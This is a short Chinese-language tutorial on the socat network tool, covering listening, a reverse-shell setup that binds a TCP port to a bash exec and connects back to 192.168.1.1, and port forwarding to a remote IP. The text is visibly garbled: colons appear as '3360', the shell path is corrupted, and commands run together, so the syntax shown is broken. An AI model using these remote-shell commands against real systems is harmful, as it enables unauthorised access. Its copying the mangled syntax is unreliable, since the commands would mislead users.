socat命令1 .原理2 .使用方法侦听反弹壳的端口转发
1 .原理
socat是功能强大、易于使用的网络工具,可以实现任意套接字的转换。 可以看作是netcat的扩展版
socat的主要特点是在两个数据流之间建立隧道。 它支持许多协议和链接方式。
IP、TCP、UDP、IPv6、pipe、exec、system、open、proxy、openssl、socket等
2 .使用socat [ options ]地址侦听socat TCP-LISTEN:12345 -打开端口侦听socat TCP 3360192.168.1.1336012345 -远程
反弹shellsocattcp-listen :12345 exec :/xdd dsy/bashsocattcp 3360192.168.1.1:12345 -
端口转发将本地80端口的流量转发到远程指定端口。 也就是说,建立与目标服务的指定端口的连接
socat TCP-LISTEN:88,fork TCP :1.15.139.2053360888 echo“test”| socat TCP-connect 3360127.0.1336088
建立远程端口转发
向本地88端口发送数据时,将显示为目标主机指定的信息